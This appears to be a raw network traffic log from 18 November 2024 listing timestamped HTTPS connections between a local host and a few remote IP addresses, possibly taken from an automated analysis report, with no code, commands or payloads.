                                          Nov 18, 2024 23:45:02.948964119 CET4435739713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:02.949450970 CET57397443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:02.949465036 CET4435739713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:03.077733040 CET4435739713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:03.077817917 CET4435739713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:03.077883005 CET57397443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:03.078098059 CET57397443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:03.078140974 CET4435739713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:03.078170061 CET57397443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:03.078186035 CET4435739713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:03.081383944 CET57402443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:03.081434011 CET4435740213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:03.081505060 CET57402443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:03.081731081 CET57402443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:03.081759930 CET4435740213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:03.401782990 CET4435739813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:03.402334929 CET57398443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:03.402348995 CET4435739813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:03.402978897 CET57398443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:03.402982950 CET4435739813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:03.475461006 CET4435740013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:03.475884914 CET57400443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:03.475920916 CET4435740013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:03.476421118 CET57400443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:03.476433992 CET4435740013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:03.504256964 CET4435739913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:03.504647017 CET57399443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:03.504699945 CET4435739913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:03.505112886 CET57399443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:03.505126953 CET4435739913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:03.534969091 CET4435739813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:03.535036087 CET4435739813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:03.535095930 CET57398443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:03.535106897 CET4435739813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:03.535142899 CET4435739813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:03.535188913 CET57398443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:03.535353899 CET57398443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:03.535367966 CET4435739813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:03.535377026 CET57398443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:03.535382986 CET4435739813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:03.538369894 CET57403443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:03.538472891 CET4435740313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:03.538573980 CET57403443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:03.538676023 CET57403443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:03.538697004 CET4435740313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:03.606065035 CET4435740013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:03.606216908 CET4435740013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:03.606287956 CET57400443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:03.606365919 CET57400443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:03.606365919 CET57400443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:03.606396914 CET4435740013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:03.606420994 CET4435740013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:03.609091043 CET57404443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:03.609185934 CET4435740413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:03.609261036 CET57404443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:03.609494925 CET57404443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:03.609530926 CET4435740413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:03.617986917 CET4435740113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:03.618349075 CET57401443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:03.618392944 CET4435740113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:03.618917942 CET57401443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:03.618931055 CET4435740113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:03.651629925 CET4435739913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:03.651772976 CET4435739913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:03.651829004 CET57399443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:03.651873112 CET57399443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:03.651873112 CET57399443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:03.651892900 CET4435739913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:03.651909113 CET4435739913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:03.654428005 CET57405443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:03.654504061 CET4435740513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:03.654573917 CET57405443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:03.654747009 CET57405443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:03.654779911 CET4435740513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:03.774343967 CET4435740113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:03.774530888 CET4435740113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:03.774604082 CET57401443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:03.774677992 CET57401443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:03.774677992 CET57401443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:03.774713039 CET4435740113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:03.774736881 CET4435740113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:03.777501106 CET57406443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:03.777539015 CET4435740613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:03.777609110 CET57406443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:03.777762890 CET57406443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:03.777782917 CET4435740613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:03.860377073 CET4435740213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:03.860852957 CET57402443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:03.860896111 CET4435740213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:03.861419916 CET57402443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:03.861430883 CET4435740213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:04.020016909 CET4435740213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:04.021272898 CET4435740213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:04.021342993 CET4435740213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:04.021377087 CET57402443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:04.021543980 CET57402443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:04.021543980 CET57402443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:04.021543980 CET57402443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:04.023895025 CET57407443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:04.023984909 CET4435740713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:04.024075031 CET57407443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:04.024200916 CET57407443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:04.024224043 CET4435740713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:04.281812906 CET4435740313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:04.282335043 CET57403443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:04.282399893 CET4435740313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:04.283026934 CET57403443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:04.283041954 CET4435740313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:04.331479073 CET57402443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:04.331533909 CET4435740213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:04.357770920 CET4435740413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:04.358448982 CET57404443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:04.358496904 CET4435740413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:04.358959913 CET57404443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:04.358967066 CET4435740413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:04.410387039 CET4435740513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:04.410923004 CET57405443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:04.410947084 CET4435740513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:04.411494017 CET57405443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:04.411500931 CET4435740513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:04.414818048 CET4435740313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:04.414985895 CET4435740313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:04.415070057 CET57403443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:04.415149927 CET57403443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:04.415149927 CET57403443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:04.415189028 CET4435740313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:04.415215969 CET4435740313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:04.418697119 CET57408443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:04.418729067 CET4435740813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:04.418849945 CET57408443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:04.418987036 CET57408443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:04.418997049 CET4435740813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:04.491508961 CET4435740413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:04.491585016 CET4435740413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:04.491833925 CET57404443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:04.491914988 CET57404443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:04.491914988 CET57404443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:04.491960049 CET4435740413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:04.491983891 CET4435740413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:04.495104074 CET57409443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:04.495152950 CET4435740913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:04.495244026 CET57409443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:04.495400906 CET57409443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:04.495419025 CET4435740913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:04.514204025 CET4435740613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:04.514730930 CET57406443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:04.514765978 CET4435740613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:04.515357971 CET57406443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:04.515368938 CET4435740613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:04.542413950 CET4435740513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:04.542562008 CET4435740513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:04.542678118 CET57405443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:04.542715073 CET57405443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:04.542735100 CET4435740513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:04.542747021 CET57405443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:04.542753935 CET4435740513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:04.545532942 CET57410443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:04.545557022 CET4435741013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:04.545619965 CET57410443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:04.545741081 CET57410443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:04.545753956 CET4435741013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:04.649642944 CET4435740613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:04.649702072 CET4435740613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:04.649800062 CET4435740613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:04.649970055 CET57406443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:04.650024891 CET57406443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:04.650024891 CET57406443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:04.650053024 CET4435740613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:04.650074005 CET4435740613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:04.653182983 CET57411443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:04.653218031 CET4435741113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:04.653316975 CET57411443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:04.653465986 CET57411443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:04.653480053 CET4435741113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:04.775573015 CET4435740713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:04.776103020 CET57407443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:04.776166916 CET4435740713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:04.776591063 CET57407443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:04.776603937 CET4435740713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:04.925936937 CET4435740713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:04.926156044 CET4435740713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:04.926234007 CET57407443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:04.926295996 CET57407443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:04.926296949 CET57407443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:04.926331997 CET4435740713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:04.926356077 CET4435740713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:04.929332972 CET57412443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:04.929425001 CET4435741213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:04.929517984 CET57412443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:04.929660082 CET57412443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:04.929680109 CET4435741213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:05.158999920 CET4435740813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:05.159785986 CET57408443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:05.159827948 CET4435740813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:05.160960913 CET57408443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:05.160974026 CET4435740813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:05.265794039 CET4435740913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:05.266302109 CET57409443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:05.266325951 CET4435740913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:05.266743898 CET57409443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:05.266748905 CET4435740913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:05.289994001 CET4435740813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:05.290062904 CET4435740813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:05.290178061 CET4435740813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:05.290246010 CET57408443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:05.290383101 CET57408443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:05.290383101 CET57408443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:05.290429115 CET57408443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:05.290456057 CET4435740813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:05.293510914 CET57413443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:05.293591976 CET4435741313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:05.293692112 CET57413443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:05.293837070 CET57413443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:05.293864965 CET4435741313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:05.372842073 CET44357353142.250.185.196192.168.2.4
                                          Nov 18, 2024 23:45:05.372900009 CET44357353142.250.185.196192.168.2.4
                                          Nov 18, 2024 23:45:05.372963905 CET57353443192.168.2.4142.250.185.196
                                          Nov 18, 2024 23:45:05.389405966 CET4435741113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:05.389991999 CET57411443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:05.390018940 CET4435741113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:05.390500069 CET57411443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:05.390505075 CET4435741113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:05.405105114 CET4435740913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:05.405179024 CET4435740913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:05.405241013 CET57409443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:05.405383110 CET57409443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:05.405400038 CET4435740913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:05.405411005 CET57409443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:05.405416965 CET4435740913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:05.408678055 CET57414443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:05.408762932 CET4435741413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:05.408876896 CET57414443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:05.409045935 CET57414443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:05.409075022 CET4435741413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:05.522089958 CET4435741113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:05.522228956 CET4435741113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:05.522293091 CET57411443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:05.522351027 CET57411443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:05.522365093 CET4435741113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:05.522373915 CET57411443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:05.522380114 CET4435741113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:05.525053024 CET57415443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:05.525098085 CET4435741513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:05.525183916 CET57415443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:05.525317907 CET57415443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:05.525346041 CET4435741513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:05.605582952 CET4435741013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:05.606206894 CET57410443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:05.606250048 CET4435741013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:05.606686115 CET57410443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:05.606700897 CET4435741013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:05.690367937 CET4435741213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:05.691009998 CET57412443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:05.691088915 CET4435741213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:05.691570044 CET57412443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:05.691586018 CET4435741213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:05.738876104 CET4435741013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:05.739006042 CET4435741013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:05.739177942 CET57410443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:05.739223957 CET57410443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:05.739224911 CET57410443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:05.739254951 CET4435741013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:05.739278078 CET4435741013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:05.742160082 CET57416443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:05.742209911 CET4435741613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:05.742295027 CET57416443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:05.742429018 CET57416443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:05.742441893 CET4435741613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:05.825212955 CET4435741213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:05.825287104 CET4435741213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:05.825381041 CET4435741213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:05.825500011 CET57412443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:05.825500965 CET57412443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:05.825579882 CET57412443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:05.825579882 CET57412443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:05.825609922 CET4435741213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:05.825633049 CET4435741213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:05.828227043 CET57417443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:05.828257084 CET4435741713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:05.828428030 CET57417443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:05.828458071 CET57417443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:05.828461885 CET4435741713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:06.024791002 CET4435741313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:06.025320053 CET57413443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:06.025368929 CET4435741313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:06.025811911 CET57413443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:06.025825977 CET4435741313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:06.164412975 CET4435741313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:06.164510012 CET4435741313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:06.164535999 CET4435741413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:06.164686918 CET57413443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:06.164722919 CET57413443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:06.164752960 CET4435741313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:06.164777994 CET57413443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:06.164793015 CET4435741313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:06.164896965 CET57414443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:06.164977074 CET4435741413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:06.165297985 CET57414443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:06.165313005 CET4435741413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:06.168152094 CET57418443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:06.168235064 CET4435741813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:06.168371916 CET57418443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:06.168508053 CET57418443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:06.168540955 CET4435741813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:06.263104916 CET4435741513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:06.263605118 CET57415443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:06.263637066 CET4435741513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:06.264045000 CET57415443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:06.264055967 CET4435741513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:06.298044920 CET4435741413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:06.298120975 CET4435741413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:06.298274994 CET57414443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:06.298456907 CET57414443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:06.298485994 CET4435741413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:06.298511028 CET57414443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:06.298523903 CET4435741413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:06.301044941 CET57419443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:06.301076889 CET4435741913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:06.301165104 CET57419443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:06.301311016 CET57419443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:06.301320076 CET4435741913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:06.394007921 CET4435741513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:06.394150972 CET4435741513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:06.394227028 CET57415443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:06.394395113 CET57415443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:06.394395113 CET57415443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:06.394421101 CET4435741513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:06.394442081 CET4435741513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:06.396661997 CET57420443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:06.396696091 CET4435742013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:06.396760941 CET57420443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:06.396882057 CET57420443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:06.396893978 CET4435742013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:06.484462976 CET4435741613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:06.484997988 CET57416443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:06.485085964 CET4435741613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:06.485357046 CET57416443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:06.485372066 CET4435741613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:06.583827019 CET4435741713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:06.584507942 CET57417443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:06.584522009 CET4435741713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:06.585000992 CET57417443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:06.585005999 CET4435741713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:06.613385916 CET4435741613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:06.613451958 CET4435741613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:06.613554001 CET4435741613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:06.613651991 CET57416443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:06.613651991 CET57416443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:06.613737106 CET57416443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:06.613737106 CET57416443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:06.613776922 CET4435741613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:06.613801956 CET4435741613.107.246.45192.168.2.4
